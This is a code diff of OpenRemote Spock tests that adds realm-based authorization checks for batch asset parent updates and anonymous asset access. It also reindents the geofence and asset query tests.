+    def assetResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(AssetResource.class)
+    def asset1 = assetResource.create(null, new RoomAsset("Batch Asset 1").setRealm(keycloakTestSetup.realmMaster.name))
+    def asset2 = assetResource.create(null, new RoomAsset("Batch Asset 2").setRealm(keycloakTestSetup.realmMaster.name))
+
+    when: "assets in the authenticated realm are moved under an authenticated parent"
+    assetResource.updateParent(null, managerTestSetup.groundFloorId, [asset1.id, asset2.id])
+
+    then: "the assets should be moved"
+    (assetResource.get(null, asset1.id) as RoomAsset).parentId == managerTestSetup.groundFloorId
+    (assetResource.get(null, asset2.id) as RoomAsset).parentId == managerTestSetup.groundFloorId
+
+    when: "the parent is cleared for assets in the authenticated realm"
+    assetResource.updateNoneParent(null, [asset1.id, asset2.id])
+
+    then: "the assets should become root assets again"
+    (assetResource.get(null, asset1.id) as RoomAsset).parentId == null
+    (assetResource.get(null, asset2.id) as RoomAsset).parentId == null
+  }
+
+  def "Batch parent clear across accessible realms succeeds for superuser"() {
+    given: "the server container is started"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+
+    and: "an authenticated admin user will make the call"
+    def accessToken = authenticate(
+            container,
+            MASTER_REALM,
+            KEYCLOAK_CLIENT_ID,
+            MASTER_REALM_ADMIN_USER,
+            getString(container.getConfig(), OR_ADMIN_PASSWORD, OR_ADMIN_PASSWORD_DEFAULT)
+            )
+
+    and: "there are child assets with parents in different accessible realms"
+    def assetResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(AssetResource.class)
+    def masterAsset = assetResource.create(null, new RoomAsset("Master batch clear").setRealm(keycloakTestSetup.realmMaster.name).setParentId(managerTestSetup.groundFloorId))
+    def buildingAsset = assetResource.create(null, new RoomAsset("Building batch clear").setRealm(keycloakTestSetup.realmBuilding.name).setParentId(managerTestSetup.smartBuildingId))
+
+    when: "the superuser clears the parent of both assets in one request"
+    assetResource.updateNoneParent(null, [masterAsset.id, buildingAsset.id])
+
+    then: "both assets should become root assets"
+    (assetResource.get(null, masterAsset.id) as RoomAsset).parentId == null
+    (assetResource.get(null, buildingAsset.id) as RoomAsset).parentId == null
+  }
+
+  def "Batch parent updates reject foreign child assets for testuser1"() {
+    given: "the server container is started"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+
+    and: "an authenticated test user will make the call"
+    def accessToken = authenticate(
+            container,
+            MASTER_REALM,
+            KEYCLOAK_CLIENT_ID,
+            "testuser1",
+            "testuser1"
+            )
+
+    and: "there is an asset in the authenticated realm"
+    def assetResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(AssetResource.class)
+    def asset1 = assetResource.create(null, new RoomAsset("Batch Asset 1").setRealm(keycloakTestSetup.realmMaster.name))
+
+    when: "a parent update is requested with an asset from a foreign realm"
+    assetResource.updateParent(null, managerTestSetup.groundFloorId, [asset1.id, managerTestSetup.apartment2LivingroomId])
+
+    then: "the request should be forbidden and no asset should be moved"
+    WebApplicationException ex = thrown()
+    ex.response.status == 403
+    (assetResource.get(null, asset1.id) as RoomAsset).parentId == null
+  }
+
+  def "Batch parent updates reject foreign parents for testuser1"() {
+    given: "the server container is started"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+
+    and: "an authenticated test user will make the call"
+    def accessToken = authenticate(
+            container,
+            MASTER_REALM,
+            KEYCLOAK_CLIENT_ID,
+            "testuser1",
+            "testuser1"
+            )
+
+    and: "there's an asset in the authenticated realm"
+    def assetResource = getClientApiTarget(serverUri(serverPort), MASTER_REALM, accessToken).proxy(AssetResource.class)
+    def asset1 = assetResource.create(null, new RoomAsset("Batch Asset 1").setRealm(keycloakTestSetup.realmMaster.name))
+
+    when: "a parent update is requested with the target parent in a foreign realm"
+    assetResource.updateParent(null, managerTestSetup.smartBuildingId, [asset1.id])
+
+    then: "the request should be forbidden and no asset should be moved"
+    WebApplicationException ex = thrown()
+    ex.response.status == 403
+    (assetResource.get(null, asset1.id) as RoomAsset).parentId == null
+  }
+
+  def "Batch parent updates are forbidden for restricted testuser3"() {
+    given: "the server container is started"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+
+    and: "an authenticated restricted user will make the call"
+    def accessToken = authenticate(
+            container,
+            keycloakTestSetup.realmBuilding.name,
+            KEYCLOAK_CLIENT_ID,
+            "testuser3",
+            "testuser3"
+            )
+
+    when: "a restricted user tries to move a linked asset"
+    def assetResource = getClientApiTarget(serverUri(serverPort), keycloakTestSetup.realmBuilding.name, accessToken).proxy(AssetResource.class)
+    assetResource.updateParent(null, managerTestSetup.apartment2Id, [managerTestSetup.apartment1LivingroomId])
+
+    then: "the request should be forbidden and the parent should remain unchanged"
+    WebApplicationException ex = thrown()
+    ex.response.status == 403
+    (assetResource.get(null, managerTestSetup.apartment1LivingroomId) as RoomAsset).parentId == managerTestSetup.apartment1Id
+  }
+
+  def "Batch parent clear is forbidden for restricted testuser3"() {
+    given: "the server container is started"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+
+    and: "an authenticated restricted user will make the call"
+    def accessToken = authenticate(
+            container,
+            keycloakTestSetup.realmBuilding.name,
+            KEYCLOAK_CLIENT_ID,
+            "testuser3",
+            "testuser3"
+            )
+
+    when: "a restricted user tries to clear the parent of a linked asset"
+    def assetResource = getClientApiTarget(serverUri(serverPort), keycloakTestSetup.realmBuilding.name, accessToken).proxy(AssetResource.class)
+    assetResource.updateNoneParent(null, [managerTestSetup.apartment1LivingroomId])
+
+    then: "the request should be forbidden and the parent should remain unchanged"
+    WebApplicationException ex = thrown()
+    ex.response.status == 403
+    (assetResource.get(null, managerTestSetup.apartment1LivingroomId) as RoomAsset).parentId == managerTestSetup.apartment1Id
+  }
+
+  def "Access assets as anonymous user"() {
+    given: "the server container is started"
+    def container = startContainer(defaultConfig(), defaultServices())
+    def managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    def keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+
+    and: "the asset resource"
+    def assetResource = getClientApiTarget(serverUri(serverPort), keycloakTestSetup.realmBuilding.name).proxy(AssetResource.class)
+
+    when: "the anonymous user tries to retrieve all assets"
+    def assets = assetResource.queryAssets(null, new AssetQuery().recursive(true))
+
+    then: "only public assets should be returned"
+    assets.size() == 3
+    assets.find {it.id == managerTestSetup.apartment1Id } != null
+    assets.find {it.id == managerTestSetup.apartment1LivingroomId } != null
+    assets.find {it.id == managerTestSetup.apartment2LivingroomId } != null
+
+    when: "the public assets are retrieved"
+    assets = assetResource.queryAssets(null, new AssetQuery()
+            .realm(new RealmPredicate(keycloakTestSetup.realmBuilding.name)))
+
+    then: "the public assets should be retrieved"
+    assert assets.size() == 3
+    assert assets.find {it.id == managerTestSetup.apartment1Id} != null
+    assert assets.find {it.id == managerTestSetup.apartment1LivingroomId} != null
+    assert assets.find {it.id == managerTestSetup.apartment2LivingroomId} != null
+
+    when: "the public assets are retrieved without a query"
+    assets = assetResource.queryAssets(null, null)
+
+    then: "the public assets should be retrieved"
+    assert assets.size() == 3
+    assert assets.find {it.id == managerTestSetup.apartment1Id} != null
+    assert assets.find {it.id == managerTestSetup.apartment1LivingroomId} != null
+    assert assets.find {it.id == managerTestSetup.apartment2LivingroomId} != null
+
+    when: "an attribute with public write is written to and another with only public read"
+    def writeResults = assetResource.writeAttributeValues(null, [
+      new AttributeState(managerTestSetup.apartment1Id, Asset.LOCATION.name, null),
+      new AttributeState(managerTestSetup.apartment2LivingroomId, Asset.LOCATION.name, null)
+    ] as AttributeState[])
+
+    then: "the request should have succeeded but only the apartment1 location event should have been successful"
+    assert writeResults.size() == 2
+    assert writeResults.find {
+      it.ref.id == managerTestSetup.apartment1Id && it.ref.name == Asset.LOCATION.name
+    }.failure == null
+    assert writeResults.find {
+      it.ref.id == managerTestSetup.apartment2LivingroomId && it.ref.name == Asset.LOCATION.name
+    }.failure == AttributeWriteFailure.INSUFFICIENT_ACCESS
+
+    when: "an attribute with public write=false is written to anonymously"
+    def result = assetResource.writeAttributeValue(null, managerTestSetup.apartment1Id, BuildingAsset.STREET.name, '"Should fail"')
+
+    then: "the request should fail with an exception"
+    WebApplicationException ex = thrown()
+    ex.response.withCloseable { r ->
+      assert r.status == 403
+      return true
+    }
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/assets/AssetQueryPredicateTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/assets/AssetQueryPredicateTest.groovy
@@ -27,32 +27,34 @@ import spock.lang.Specification
 
 class AssetQueryPredicateTest extends Specification {
 
-    def "Rectangular Geofence Test"() {
-        given:
-        GeofencePredicate geofencePredicate = new RectangularGeofencePredicate(51.440914, 5.421723, 51.442755, 5.425151)
-        def coordinatePredicate = geofencePredicate.asPredicate({ -> System.currentTimeMillis() })
-        def coordinatePredicateNegated = coordinatePredicate.negate()
+  def "Rectangular Geofence Test"() {
+    given:
+    GeofencePredicate geofencePredicate = new RectangularGeofencePredicate(51.440914, 5.421723, 51.442755, 5.425151)
+    def coordinatePredicate = geofencePredicate.asPredicate({ -> System.currentTimeMillis() })
+    def coordinatePredicateNegated = coordinatePredicate.negate()
 
-        expect:
-        coordinatePredicate.test(new Coordinate(5.423, 51.441))
-        !coordinatePredicateNegated.test(new Coordinate(5.423, 51.441))
-    }
+    expect:
+    coordinatePredicate.test(new Coordinate(5.423, 51.441))
+    !coordinatePredicateNegated.test(new Coordinate(5.423, 51.441))
+  }
 
-    def "Radial geofence test"() {
-        given:
-        GeofencePredicate geofencePredicate = new RadialGeofencePredicate(100, 51.423, 5.441)
-        GeofencePredicate geofencePredicateNegated = new RadialGeofencePredicate(100, 51.423, 5.441).negate()
-        def coordinatePredicate = geofencePredicate.asPredicate({ -> System.currentTimeMillis() })
-        def coordinatePredicateNegated = geofencePredicateNegated.asPredicate({ -> System.currentTimeMillis() })
+  def "Radial geofence test"() {
+    given:
+    GeofencePredicate geofencePredicate = new RadialGeofencePredicate(100, 51.423, 5.441)
+    GeofencePredicate geofencePredicateNegated = new RadialGeofencePredicate(100, 51.423, 5.441).negate()
+    def coordinatePredicate = geofencePredicate.asPredicate({ -> System.currentTimeMillis() })
+    def coordinatePredicateNegated = geofencePredicateNegated.asPredicate({
+      -> System.currentTimeMillis()
+    })
 
-        expect:
-        coordinatePredicate.test(new Coordinate(5.441, 51.423))
-        !coordinatePredicateNegated.test(new Coordinate(5.441, 51.423))
-    }
+    expect:
+    coordinatePredicate.test(new Coordinate(5.441, 51.423))
+    !coordinatePredicateNegated.test(new Coordinate(5.441, 51.423))
+  }
 
-    def "GeoJSON Polygon geofence test"() {
-        given: "A simple polygon representing a rectangular area around Vienna"
-        def polygonGeoJSON = '''
+  def "GeoJSON Polygon geofence test"() {
+    given: "A simple polygon representing a rectangular area around Vienna"
+    def polygonGeoJSON = '''
         {
             "type": "Polygon",
             "coordinates": [
@@ -66,22 +68,22 @@ class AssetQueryPredicateTest extends Specification {
             ]
         }
         '''
-        GeofencePredicate geofencePredicate = new GeoJSONGeofencePredicate(polygonGeoJSON)
-        def coordinatePredicate = geofencePredicate.asPredicate({ -> System.currentTimeMillis() })
+    GeofencePredicate geofencePredicate = new GeoJSONGeofencePredicate(polygonGeoJSON)
+    def coordinatePredicate = geofencePredicate.asPredicate({ -> System.currentTimeMillis() })
 
-        expect: "Points inside the polygon should return true"
-        assert coordinatePredicate.test(new Coordinate(16.4, 48.2))
-        assert coordinatePredicate.test(new Coordinate(16.3, 48.15))
+    expect: "Points inside the polygon should return true"
+    assert coordinatePredicate.test(new Coordinate(16.4, 48.2))
+    assert coordinatePredicate.test(new Coordinate(16.3, 48.15))
 
-        and: "Points outside the polygon should return false"
-        assert !coordinatePredicate.test(new Coordinate(16.0, 48.2))
-        assert !coordinatePredicate.test(new Coordinate(16.4, 48.5))
-        assert !coordinatePredicate.test(new Coordinate(17.0, 48.2))
-    }
+    and: "Points outside the polygon should return false"
+    assert !coordinatePredicate.test(new Coordinate(16.0, 48.2))
+    assert !coordinatePredicate.test(new Coordinate(16.4, 48.5))
+    assert !coordinatePredicate.test(new Coordinate(17.0, 48.2))
+  }
 
-    def "GeoJSON Polygon with hole geofence test"() {
-        given: "A polygon with a hole (donut shape)"
-        def polygonWithHoleGeoJSON = '''
+  def "GeoJSON Polygon with hole geofence test"() {
+    given: "A polygon with a hole (donut shape)"
+    def polygonWithHoleGeoJSON = '''
         {
             "type": "Polygon",
             "coordinates": [
@@ -102,23 +104,23 @@ class AssetQueryPredicateTest extends Specification {
             ]
         }
         '''
-        GeofencePredicate geofencePredicate = new GeoJSONGeofencePredicate(polygonWithHoleGeoJSON)
-        def coordinatePredicate = geofencePredicate.asPredicate({ -> System.currentTimeMillis() })
+    GeofencePredicate geofencePredicate = new GeoJSONGeofencePredicate(polygonWithHoleGeoJSON)
+    def coordinatePredicate = geofencePredicate.asPredicate({ -> System.currentTimeMillis() })
 
-        expect: "Points in the outer ring but not in the hole should return true"
-        assert coordinatePredicate.test(new Coordinate(16.25, 48.2))
-        assert coordinatePredicate.test(new Coordinate(16.55, 48.2))
+    expect: "Points in the outer ring but not in the hole should return true"
+    assert coordinatePredicate.test(new Coordinate(16.25, 48.2))
+    assert coordinatePredicate.test(new Coordinate(16.55, 48.2))
 
-        and: "Points in the hole should return false"
-        assert !coordinatePredicate.test(new Coordinate(16.4, 48.2))
+    and: "Points in the hole should return false"
+    assert !coordinatePredicate.test(new Coordinate(16.4, 48.2))
 
-        and: "Points outside should return false"
-        assert !coordinatePredicate.test(new Coordinate(16.0, 48.2))
-    }
+    and: "Points outside should return false"
+    assert !coordinatePredicate.test(new Coordinate(16.0, 48.2))
+  }
 
-    def "GeoJSON MultiPolygon geofence test"() {
-        given: "A MultiPolygon representing two separate regions"
-        def multiPolygonGeoJSON = '''
+  def "GeoJSON MultiPolygon geofence test"() {
+    given: "A MultiPolygon representing two separate regions"
+    def multiPolygonGeoJSON = '''
         {
             "type": "MultiPolygon",
             "coordinates": [
@@ -143,24 +145,24 @@ class AssetQueryPredicateTest extends Specification {
             ]
         }
         '''
-        GeofencePredicate geofencePredicate = new GeoJSONGeofencePredicate(multiPolygonGeoJSON)
-        def coordinatePredicate = geofencePredicate.asPredicate({ -> System.currentTimeMillis() })
+    GeofencePredicate geofencePredicate = new GeoJSONGeofencePredicate(multiPolygonGeoJSON)
+    def coordinatePredicate = geofencePredicate.asPredicate({ -> System.currentTimeMillis() })
 
-        expect: "Points inside either polygon should return true"
-        assert coordinatePredicate.test(new Coordinate(16.3, 48.15))
-        assert coordinatePredicate.test(new Coordinate(16.6, 48.15))
+    expect: "Points inside either polygon should return true"
+    assert coordinatePredicate.test(new Coordinate(16.3, 48.15))
+    assert coordinatePredicate.test(new Coordinate(16.6, 48.15))
 
-        and: "Points between the polygons should return false"
-        assert !coordinatePredicate.test(new Coordinate(16.45, 48.15))
+    and: "Points between the polygons should return false"
+    assert !coordinatePredicate.test(new Coordinate(16.45, 48.15))
 
-        and: "Points outside both polygons should return false"
-        assert !coordinatePredicate.test(new Coordinate(16.0, 48.15))
-        assert !coordinatePredicate.test(new Coordinate(16.8, 48.15))
-    }
+    and: "Points outside both polygons should return false"
+    assert !coordinatePredicate.test(new Coordinate(16.0, 48.15))
+    assert !coordinatePredicate.test(new Coordinate(16.8, 48.15))
+  }
 
-    def "GeoJSON Feature geofence test"() {
-        given: "A Feature containing a polygon geometry"
-        def featureGeoJSON = '''
+  def "GeoJSON Feature geofence test"() {
+    given: "A Feature containing a polygon geometry"
+    def featureGeoJSON = '''
         {
             "type": "Feature",
             "properties": {
@@ -180,19 +182,19 @@ class AssetQueryPredicateTest extends Specification {
             }
         }
         '''
-        GeofencePredicate geofencePredicate = new GeoJSONGeofencePredicate(featureGeoJSON)
-        def coordinatePredicate = geofencePredicate.asPredicate({ -> System.currentTimeMillis() })
+    GeofencePredicate geofencePredicate = new GeoJSONGeofencePredicate(featureGeoJSON)
+    def coordinatePredicate = geofencePredicate.asPredicate({ -> System.currentTimeMillis() })
 
-        expect: "Points inside the feature's geometry should return true"
-        assert coordinatePredicate.test(new Coordinate(16.4, 48.2))
+    expect: "Points inside the feature's geometry should return true"
+    assert coordinatePredicate.test(new Coordinate(16.4, 48.2))
 
-        and: "Points outside should return false"
-        assert !coordinatePredicate.test(new Coordinate(16.0, 48.2))
-    }
+    and: "Points outside should return false"
+    assert !coordinatePredicate.test(new Coordinate(16.0, 48.2))
+  }
 
-    def "GeoJSON FeatureCollection geofence test"() {
-        given: "A FeatureCollection with multiple features"
-        def featureCollectionGeoJSON = '''
+  def "GeoJSON FeatureCollection geofence test"() {
+    given: "A FeatureCollection with multiple features"
+    def featureCollectionGeoJSON = '''
         {
             "type": "FeatureCollection",
             "features": [
@@ -231,21 +233,21 @@ class AssetQueryPredicateTest extends Specification {
             ]
         }
         '''
-        GeofencePredicate geofencePredicate = new GeoJSONGeofencePredicate(featureCollectionGeoJSON)
-        def coordinatePredicate = geofencePredicate.asPredicate({ -> System.currentTimeMillis() })
+    GeofencePredicate geofencePredicate = new GeoJSONGeofencePredicate(featureCollectionGeoJSON)
+    def coordinatePredicate = geofencePredicate.asPredicate({ -> System.currentTimeMillis() })
 
-        expect: "Points inside any feature should return true"
-        assert coordinatePredicate.test(new Coordinate(16.3, 48.15))
-        assert coordinatePredicate.test(new Coordinate(16.6, 48.15))
+    expect: "Points inside any feature should return true"
+    assert coordinatePredicate.test(new Coordinate(16.3, 48.15))
+    assert coordinatePredicate.test(new Coordinate(16.6, 48.15))
 
-        and: "Points outside all features should return false"
-        assert !coordinatePredicate.test(new Coordinate(16.45, 48.15))
-        assert !coordinatePredicate.test(new Coordinate(16.0, 48.15))
-    }
+    and: "Points outside all features should return false"
+    assert !coordinatePredicate.test(new Coordinate(16.45, 48.15))
+    assert !coordinatePredicate.test(new Coordinate(16.0, 48.15))
+  }
 
-    def "GeoJSON negated geofence test"() {
-        given: "A polygon geofence that is negated"
-        def polygonGeoJSON = '''
+  def "GeoJSON negated geofence test"() {
+    given: "A polygon geofence that is negated"
+    def polygonGeoJSON = '''
         {
             "type": "Polygon",
             "coordinates": [
@@ -259,20 +261,20 @@ class AssetQueryPredicateTest extends Specification {
             ]
         }
         '''
-        GeofencePredicate geofencePredicate = new GeoJSONGeofencePredicate(polygonGeoJSON).negate()
-        def coordinatePredicate = geofencePredicate.asPredicate({ -> System.currentTimeMillis() })
+    GeofencePredicate geofencePredicate = new GeoJSONGeofencePredicate(polygonGeoJSON).negate()
+    def coordinatePredicate = geofencePredicate.asPredicate({ -> System.currentTimeMillis() })
 
-        expect: "Points inside the polygon should return false (negated)"
-        assert !coordinatePredicate.test(new Coordinate(16.4, 48.2))
+    expect: "Points inside the polygon should return false (negated)"
+    assert !coordinatePredicate.test(new Coordinate(16.4, 48.2))
 
-        and: "Points outside the polygon should return true (negated)"
-        assert coordinatePredicate.test(new Coordinate(16.0, 48.2))
-        assert coordinatePredicate.test(new Coordinate(17.0, 48.2))
-    }
+    and: "Points outside the polygon should return true (negated)"
+    assert coordinatePredicate.test(new Coordinate(16.0, 48.2))
+    assert coordinatePredicate.test(new Coordinate(17.0, 48.2))
+  }
 
-    def "GeoJSON simplified Austria border test"() {
-        given: "A simplified polygon representing Austria's approximate borders"
-        def austriaGeoJSON = '''
+  def "GeoJSON simplified Austria border test"() {
+    given: "A simplified polygon representing Austria's approximate borders"
+    def austriaGeoJSON = '''
         {
             "type": "Polygon",
             "coordinates": [
@@ -286,34 +288,34 @@ class AssetQueryPredicateTest extends Specification {
             ]
         }
         '''
-        GeofencePredicate geofencePredicate = new GeoJSONGeofencePredicate(austriaGeoJSON)
-        def coordinatePredicate = geofencePredicate.asPredicate({ -> System.currentTimeMillis() })
+    GeofencePredicate geofencePredicate = new GeoJSONGeofencePredicate(austriaGeoJSON)
+    def coordinatePredicate = geofencePredicate.asPredicate({ -> System.currentTimeMillis() })
 
-        expect: "Vienna (16.37, 48.21) should be inside Austria"
-        assert coordinatePredicate.test(new Coordinate(16.37, 48.21))
+    expect: "Vienna (16.37, 48.21) should be inside Austria"
+    assert coordinatePredicate.test(new Coordinate(16.37, 48.21))
 
-        and: "Salzburg (13.04, 47.81) should be inside Austria"
-        assert coordinatePredicate.test(new Coordinate(13.04, 47.81))
+    and: "Salzburg (13.04, 47.81) should be inside Austria"
+    assert coordinatePredicate.test(new Coordinate(13.04, 47.81))
 
-        and: "Innsbruck (11.39, 47.27) should be inside Austria"
-        assert coordinatePredicate.test(new Coordinate(11.39, 47.27))
+    and: "Innsbruck (11.39, 47.27) should be inside Austria"
+    assert coordinatePredicate.test(new Coordinate(11.39, 47.27))
 
-        and: "Munich, Germany (11.58, 48.14) should be outside (in this simplified border)"
-        assert coordinatePredicate.test(new Coordinate(11.58, 48.14)) // Actually inside our simplified box
+    and: "Munich, Germany (11.58, 48.14) should be outside (in this simplified border)"
+    assert coordinatePredicate.test(new Coordinate(11.58, 48.14)) // Actually inside our simplified box
 
-        and: "Bratislava, Slovakia (17.11, 48.15) should be inside (border city)"
-        assert coordinatePredicate.test(new Coordinate(17.11, 48.15))
+    and: "Bratislava, Slovakia (17.11, 48.15) should be inside (border city)"
+    assert coordinatePredicate.test(new Coordinate(17.11, 48.15))
 
-        and: "Prague, Czech Republic (14.42, 50.08) should be outside Austria"
-        assert !coordinatePredicate.test(new Coordinate(14.42, 50.08))
+    and: "Prague, Czech Republic (14.42, 50.08) should be outside Austria"
+    assert !coordinatePredicate.test(new Coordinate(14.42, 50.08))
 
-        and: "Rome, Italy (12.50, 41.90) should be outside Austria"
-        assert !coordinatePredicate.test(new Coordinate(12.50, 41.90))
-    }
+    and: "Rome, Italy (12.50, 41.90) should be outside Austria"
+    assert !coordinatePredicate.test(new Coordinate(12.50, 41.90))
+  }
 
-    def "GeoJSON centre point calculation test"() {
-        given: "A polygon geofence"
-        def polygonGeoJSON = '''
+  def "GeoJSON centre point calculation test"() {
+    given: "A polygon geofence"
+    def polygonGeoJSON = '''
         {
             "type": "Polygon",
             "coordinates": [
@@ -327,35 +329,37 @@ class AssetQueryPredicateTest extends Specification {
             ]
         }
         '''
-        GeofencePredicate geofencePredicate = new GeoJSONGeofencePredicate(polygonGeoJSON)
+    GeofencePredicate geofencePredicate = new GeoJSONGeofencePredicate(polygonGeoJSON)
 
-        when: "Getting the centre point"
-        def centrePoint = geofencePredicate.getCentrePoint()
+    when: "Getting the centre point"
+    def centrePoint = geofencePredicate.getCentrePoint()
 
-        then: "The centre point should be approximately at the centroid"
-        assert centrePoint != null
-        assert centrePoint.length == 2
-        assert Math.abs(centrePoint[0] - 16.5) < 0.1 // longitude
-        assert Math.abs(centrePoint[1] - 48.5) < 0.1 // latitude
+    then: "The centre point should be approximately at the centroid"
+    assert centrePoint != null
+    assert centrePoint.length == 2
+    assert Math.abs(centrePoint[0] - 16.5) < 0.1 // longitude
+    assert Math.abs(centrePoint[1] - 48.5) < 0.1 // latitude
+  }
+
+  def "GeoJSON invalid input handling test"() {
+    given: "Various invalid GeoJSON inputs"
+    def invalidInputs = [
+      null,
+      "",
+      "not json",
+      "{}",
+      '{"type": "Unknown"}',
+      '{"coordinates": [[0,0]]}' // missing type
+    ]
+
+    expect: "Predicates with invalid input should handle gracefully"
+    invalidInputs.each { invalidGeoJSON ->
+      def geofencePredicate = new GeoJSONGeofencePredicate(invalidGeoJSON)
+      def coordinatePredicate = geofencePredicate.asPredicate({
+        -> System.currentTimeMillis()
+      })
+      // Should return false for any coordinate when GeoJSON is invalid
+      assert !coordinatePredicate.test(new Coordinate(16.4, 48.2))
     }
-
-    def "GeoJSON invalid input handling test"() {
-        given: "Various invalid GeoJSON inputs"
-        def invalidInputs = [
-            null,
-            "",
-            "not json",
-            "{}",
-            '{"type": "Unknown"}',
-            '{"coordinates": [[0,0]]}' // missing type
-        ]
-
-        expect: "Predicates with invalid input should handle gracefully"
-        invalidInputs.each { invalidGeoJSON ->
-            def geofencePredicate = new GeoJSONGeofencePredicate(invalidGeoJSON)
-            def coordinatePredicate = geofencePredicate.asPredicate({ -> System.currentTimeMillis() })
-            // Should return false for any coordinate when GeoJSON is invalid
-            assert !coordinatePredicate.test(new Coordinate(16.4, 48.2))
-        }
-    }
+  }
 }

--- a/test/src/test/groovy/org/openremote/test/assets/AssetQueryTest.groovy
+++ b/test/src/test/groovy/org/openremote/test/assets/AssetQueryTest.groovy
@@ -61,1060 +61,1060 @@ import static org.openremote.model.value.ValueType.TIMESTAMP_ISO8601
 
 class AssetQueryTest extends Specification implements ManagerContainerTrait {
 
-    @Shared
-    static ManagerTestSetup managerTestSetup
-    @Shared
-    static KeycloakTestSetup keycloakTestSetup
-    @Shared
-    static AssetStorageService assetStorageService
-    @Shared
-    static AssetProcessingService assetProcessingService
-    @Shared
-    static PersistenceService persistenceService
+  @Shared
+  static ManagerTestSetup managerTestSetup
+  @Shared
+  static KeycloakTestSetup keycloakTestSetup
+  @Shared
+  static AssetStorageService assetStorageService
+  @Shared
+  static AssetProcessingService assetProcessingService
+  @Shared
+  static PersistenceService persistenceService
 
-    def setupSpec() {
-        given: "the server container is started"
-        def container = startContainer(defaultConfig(), defaultServices())
-        managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
-        keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
-        assetStorageService = container.getService(AssetStorageService.class)
-        assetProcessingService = container.getService(AssetProcessingService.class)
-        persistenceService = container.getService(PersistenceService.class)
-    }
+  def setupSpec() {
+    given: "the server container is started"
+    def container = startContainer(defaultConfig(), defaultServices())
+    managerTestSetup = container.getService(SetupService.class).getTaskOfType(ManagerTestSetup.class)
+    keycloakTestSetup = container.getService(SetupService.class).getTaskOfType(KeycloakTestSetup.class)
+    assetStorageService = container.getService(AssetStorageService.class)
+    assetProcessingService = container.getService(AssetProcessingService.class)
+    persistenceService = container.getService(PersistenceService.class)
+  }
 
-    // TODO: Test attribute/meta mustnotexist
-    // TODO: Test ID and user ID
-    // TODO: Test multiple logic groups with different conditions
-    // TODO: Test Array predicate
+  // TODO: Test attribute/meta mustnotexist
+  // TODO: Test ID and user ID
+  // TODO: Test multiple logic groups with different conditions
+  // TODO: Test Array predicate
 
-    def "Query assets 1"() {
+  def "Query assets 1"() {
 
-        when: "an agent filtering query is executed"
-        def assets = assetStorageService.findAll(
-                new AssetQuery()
-                        .types(Agent.class)
-                        .realm(new RealmPredicate(keycloakTestSetup.realmMaster.name))
-        )
-
-        then: "agent assets should be retrieved"
-        assets.size() == 1
-        assets[0] instanceof SimulatorAgent
-        assets[0].id == managerTestSetup.agentId
-        assets[0].name == "Demo Agent"
-        assets[0].type == SimulatorAgent.DESCRIPTOR.name
-        assets[0].parentId == managerTestSetup.lobbyId
-        assets[0].realm == managerTestSetup.realmMasterName
-
-        when: "a user filtering query is executed"
-        def query = new AssetQuery().userIds(keycloakTestSetup.testuser3Id)
-        assets = assetStorageService.findAll(query)
-
-        then: "only the users assets should be retrieved"
-        assets.size() == 6
-        assetStorageService.count(query) == 6
-        assets.get(0).id == managerTestSetup.apartment1Id
-        assets.get(1).id == managerTestSetup.apartment1LivingroomId
-        assets.get(1).getAttributes().size() == 14
-        assets.get(1).getAttribute("motionSensor").isPresent()
-        !assets.get(1).getAttribute("currentTemperature").get().getValue().isPresent()
-        !assets.get(1).getAttribute("currentTemperature").get().meta.isEmpty()
-        !assets.get(1).getAttribute("targetTemperature").get().getValue().isPresent()
-        !assets.get(1).getAttribute("targetTemperature").get().meta.isEmpty()
-        assets.get(2).id == managerTestSetup.apartment1KitchenId
-        assets.get(3).id == managerTestSetup.apartment1HallwayId
-        assets.get(4).id == managerTestSetup.apartment1Bedroom1Id
-        assets.get(5).id == managerTestSetup.apartment1BathroomId
-
-        when: "a user filtering query is executed that limits to protected attributes"
-        query = new AssetQuery()
-                .userIds(keycloakTestSetup.testuser3Id)
-                .access(PROTECTED)
-        assets = assetStorageService.findAll(query)
-
-        then: "only the users assets should be retrieved"
-        assets.size() == 6
-        assetStorageService.count(query) == 6
-        assets.get(0).id == managerTestSetup.apartment1Id
-        assets.get(1).id == managerTestSetup.apartment1LivingroomId
-        assets.get(1).getAttributes().size() == 8
-        !assets.get(1).getAttribute("motionSensor").isPresent()
-        !assets.get(1).getAttribute("currentTemperature").get().getValue().isPresent()
-        !assets.get(1).getAttribute("currentTemperature").get().meta.isEmpty()
-        assets[1].getAttribute("currentTemperature").get().getMetaItem(LABEL).isPresent()
-        assets[1].getAttribute("currentTemperature").get().getMetaValue(LABEL).orElse("") == "Current temperature"
-        !assets.get(1).getAttribute("targetTemperature").get().getValue().isPresent()
-        !assets.get(1).getAttribute("targetTemperature").get().meta.isEmpty()
-        assets.get(2).id == managerTestSetup.apartment1KitchenId
-        assets.get(3).id == managerTestSetup.apartment1HallwayId
